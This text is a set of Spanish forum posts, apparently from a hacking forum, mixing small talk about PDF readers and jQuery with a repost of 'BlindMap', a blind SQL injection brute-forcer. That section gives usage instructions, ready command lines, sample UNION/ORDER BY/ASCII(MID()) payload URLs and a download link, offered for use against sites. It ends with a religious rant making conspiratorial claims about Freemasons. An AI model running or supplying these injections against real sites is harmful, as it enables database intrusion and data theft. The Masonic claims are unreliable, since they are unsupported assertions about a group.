Mensajes

ubuntu siempre ha traido un lector nativo de pdf que sirve para varios formatos mas, se llama document viewer y es bastante cómodo y fácil de usar, muy similar al adobe reader 5 pero sin la barra de yahoo xD

adobe .. mm. no se si adobe hace las cosas muy mal o es que sus productos son tan masificados que son la mira de mucha gente para buscar vunerabilidades, porque no solo adobe reader tiene horrendos bugs sino que flash también y la mayoría de los productos de adobe. Cuando flash era propiedad de macromedia no tenian tantos problemas y cuando pasó a adobe lo bombardearon con 0days.

[']

$(#mydiv).load(pagina.php)

pagina.php no es una variable ni constante ni función, pagina no es un objeto como para decir pagina.match() o pagina.php.sort(), es un string! por lo tanto va encerrado en comillas:

$(#mydiv).load('pagina.php')

jaja aparece al final del video

sdc el que apaga las luces de la ciudad jajajaja, así trabaja sdc para tener con que comprar las pizzas:

no se como sea pero supongo que debe ser muy similar al sss.

Si quieres aprender seguridad a nivel WEB te recomiendo que aprendas el lenguaje de programación WEB para que puedas comprender cada falla y como independizarte de los escaneaores.

Date una vuelta por acá:
http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html

[BlindMap - Advanced SQL Injection By COdebreak]

si, ese mismo era.

BlindMap - Advanced SQL Injection By COdebreak

Copiado de la sección privada.
Lo hice público en w4ck1ng, asi que ahora tb lo hago público acá.

(si, esta en ingles)
-------------------------------------------------------------------------

Hi,

Here's a little app that I've made the other day.
This application is an automated blind sql injection brute-forcer. The main idea of this tool is the ability to construct custom sql injections (blind or not) and use the power of the brute force. I know there's a lot of blind sql injection tools out there, but all of them (at least the ones I know) have pre made injections to find out specific information, and doesn't give you the freedom to create your own injections with automated process.

With this tool you can create your own injections and use incremental char(n) to find out valuable information and you can even use wordlists to find out common table names, column names and so on.

The app use:

Código [Seleccionar] Expandir


 ______ _ _      ____ ___      
 | ___ \ (_)     | | \/ |      
 | |_/ / |_ _ __  __| | . . | __ _ _ __
 | ___ \ | | '_ \ / _` | |\/| |/ _` | '_ \
 | |_/ / | | | | | (_| | | | | (_| | |_) |
 \____/|_|_|_| |_|\__,_\_| |_/\__,_| .__/
                  | |  
                  |_| Rev.4

~ [ [url]www.codebreak.tk[/url] - codebreak1984 @gmail.com] ~

 Blind SQL Mapper - For advanced SQL Injection

Works with all mysql versions. Just desing a valid query.


Coded by: Codebreak (a.k.a Codebreak1984)
Contact: codebreak1984 @gmail.com

-----------------------------------------------------------------------------
Usage: sql.exe -type host path injection check
type:
-column   Will try to find valid columns using a wordlist.
-brute    Will try to bruteforce your query.
-table    Will bruteforce your query with a wordlist.
host:    target server (ip or hostname)
path:    vulnerable path, including script and variable
injection:  a valid mysql query.
-[+]     the incremental MID variable, in case of a true query.
-[char]    the incremental char numbers to compare the column data.
-[word]    You can test words from a wordlist. Nice to find tables.
check:    A string shown in a valid query

Examples:

sql.exe -brute "[url]www.injectme.com"[/url] "/guestbook/recorded/show.php?id=1" "+AND+ASCII(MID(column,[+],1))=[char]" "admin data"

sql.exe -column "[url]www.injectme.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

sql.exe -table "[url]www.injectme.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

-----------------------------------------------------------------------------



Here's an example:
I have a bugged script, and I found out that there's a column called "name", so I want to find data inside that column, asociated to my search query (id=404). This query should work in mysql 3.x.

Código [Seleccionar] Expandir

sql.exe -brute "localhost" "/system/search.php?search=404" "+AND+ASCII(MID(name,[+],1))=[char]" "404"

Where:

Código [Seleccionar] Expandir

- Host: localhost.
- Path (and valid query): "/system/search.php?search=404"
- Injection: "+AND+ASCII(MID(name,[+],1))=[char]"
- column: name
- Using [+] and [char] for bruteforcing purpose. ("[+]" increments only when a valid match appears and "[char]" increments until a valid match).
- match: 404 (not for the ID, it's for the results in the picture).
* I know that the data already appears in the picture and there's no point to the injection, is just a POC.

This will try:

Código [Seleccionar] Expandir

search.php?search=404+AND+ASCII(MID(name,1,1))=76
search.php?search=404+AND+ASCII(MID(name,1,1))=77
search.php?search=404+AND+ASCII(MID(name,2,1))=32
search.php?search=404+AND+ASCII(MID(name,2,1))=33
search.php?search=404+AND+ASCII(MID(name,2,1))=34
search.php?search=404+AND+ASCII(MID(name,2,1))=35

Result:



Another example: mysql 3.x
I've found another sql injection, and I want to know column names by using the following query:

Código [Seleccionar] Expandir

ORDER+BY+column--

So, i'll try with this:

Código [Seleccionar] Expandir

sql.exe -column "[url]www.somesite.com"[/url] "/news/news.php?id=1" "Ps3 released!" "wordlist.txt"

Where:
- Host: ww.somesite.com
- Path (and valid query): ""/news/news.php?id=1"
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"

This will try:

Código [Seleccionar] Expandir


news.php?id=1+ORDER+BY+user-
news.php?id=1+ORDER+BY+users--
news.php?id=1+ORDER+BY+pass--
news.php?id=1+ORDER+BY+password--
news.php?id=1+ORDER+BY+passwords--

* When a valid match is found, the app will print the valid column name.
** This is the only query that cannot be modified. It's pre-made.


Another example!: mysql 4.x
I've found another sql injection, and I can use "UNION" in the query... so I'll try to find out table names.

So, i'll try with this:

Código [Seleccionar] Expandir

sql.exe -table "[url]www.somesite.com"[/url] "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]" "Ps3 released!" "wordlist.txt"

Where:
- Host: www.somesite.com
- Path & Valid Injection (Nº of columns): "/news/news.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+[word]"
- Using "[word]" as a variable where the words extracted from the wordlist will be.
- Match: "Ps3 released!"
- Wordlist: "wordlist.txt"
* When a valid match is found, the app will print the valid word.


Of course they're are just examples, you can make your own valid queries.
The main idea of this app is to have an extra hand in the time when the process could be automated, because as you can see, is not that user friendly and is more like and advanced tool.

You can download it here:
http://rapidshare.com/files/30757746/sql.zip.html

Bye!

BlindMap - Advanced SQL Injection By COdebreak

bueno hoy se cumplió el plazo y nadie ganó xDDDD buuuuuu

uuuuuh si hicieramos un tuto de cada modem o router vulnerable a ataques web entonces tendriamos que hacer un foro solo para eso xDDD, es dificil encontrar un equipo de estos sin una vulnerabilidad WEB.

Pero igual muchas gracias por la info.

es como un taringa en tiempo real xDDD

Lo que mas da risa es que presentan a sdc mostrando mi msn jajajajja fail xD

[youtube=425,350]http://www.youtube.com/watch?v=p0HUoncTAAc[/youtube]

los masones es una secta derivada de la religion catolica que mantiene un poder economico pero no se rige por la doctrina del Cristianismo como muchas mas.
es una secta con mucho poder y dinero pero no salva ni ayuda al hombre, porque

Lucas 12:15

porque la vida del hombre no consiste en la abundancia de los bienes que posee

B - No, en absoluto. Precisamente en nuestras reuniones esta prohibido hablar de religión y política. Nosotros somos respetuosos con todas las creencias y admitimos en nuestra institución todas las formas de pensamiento dentro del marco de la convivencia democrática

ok, o sea que si yo desido algo que nos conviene a todos pero está mal entonces se hace dependiendo de muchas doctrinas y puntos de vista religioso y no religioso... eso está mal, porque no hacemos lo que queremos ni lo que nos conviene sino lo que Dios quiere porque Dios sabe lo que nos conviene.

Romanos 7:14 al 18

Porque sabemos que la ley es espiritual; mas yo soy carnal, vendido al pecado. Porque lo que hago, no lo entiendo; pues no hago lo que quiero, sino lo que aborrezco, eso hago. Y si lo que no quiero, esto hago, apruebo que la ley es buena. De manera que ya no soy yo quien hace aquello, sino el pecado que mora en mí. Y yo sé que en mí, esto es, en mi carne, no mora el bien; porque el querer el bien está en mí, pero no el hacerlo.

A - Que es lo que a su juicio hace que la Masonería, siendo tan antigua, no haya desaparecido.
B - La universalidad del ideal masónico, la solidez de sus estructuras a través del tiempo han estado siempre presentes en la evolución humana por rápida que ésta haya sido. La Masonería es una sociedad de pensamiento de reflexión de imaginación. Y por ella han pasado hombres de todas las ramas del saber humano que son los verdaderos eslabones de esa cadena humana que se llama Masonería.

Claro, los masones son dueños de universidades, empresas multimillonarias y solo las pueden heredar entre ellos mismos, si no eres mazon no puedes tomar posecion de nada.

A - ¿La Masonería es una sociedad secreta?
B - Mejor sería decir discreta.

Mateo 5:15 al 16

Vosotros sois la luz del mundo; una ciudad asentada sobre un monte no se puede esconder.
Ni se enciende una luz y se pone debajo de un almud, sino sobre el candelero, y alumbra a todos los que están en casa. Así alumbre vuestra luz delante de los hombres, para que vean vuestras buenas obras, y glorifiquen a vuestro Padre que está en los cielos

A - Pero a pesar de todo dicen que Uds. no son religiosos.
B - Yo le diría lo contrario. Precisamente el masón en esa búsqueda de la verdad, suele volverse más espiritual

Apocalipsis 3:15

Yo conozco tus obras, que ni eres frío ni caliente. ¡Ojalá fueras frío o caliente!

y para rematar:

A - Según Uds. ¿dónde se encuentran los fundamentos de la verdadera moral?
B - En nuestra propia conciencia y en los fundamentos éticos de la cultura de la humanidad.

Isaias 10:12 al 16

Pero acontecerá que después que el Señor haya acabado toda su obra en el monte de Sion y en Jerusalén, castigará el fruto de la soberbia del corazón del rey de Asiria, y la gloria de la altivez de sus
ojos.
Porque dijo: Con el poder de mi mano lo he hecho, y con mi sabiduría, porque he sido prudente; quité los territorios de los pueblos, y saqueé sus tesoros, y derribé como valientes a los que estaban sentados;
y halló mi mano como nido las riquezas de los pueblos; y como se recogen los huevos abandonados, así me apoderé yo de toda la tierra; y no hubo quien moviese ala, ni abriese boca y graznase.
¿Se gloriará el hacha contra el que con ella corta? ¿Se ensoberbecerá la sierra contra el que la mueve? ¡Como si el báculo levantase al que lo levanta; como si levantase la vara al que no es leño!
Por esto el Señor, Jehová de los ejércitos, enviará debilidad sobre sus robustos, y debajo de su gloria encenderá una hoguera como ardor de fuego

La masonería es una secta no Cristiana y por mucho dinero que tengan o te prometan todo el mundo hay que tener cuidado.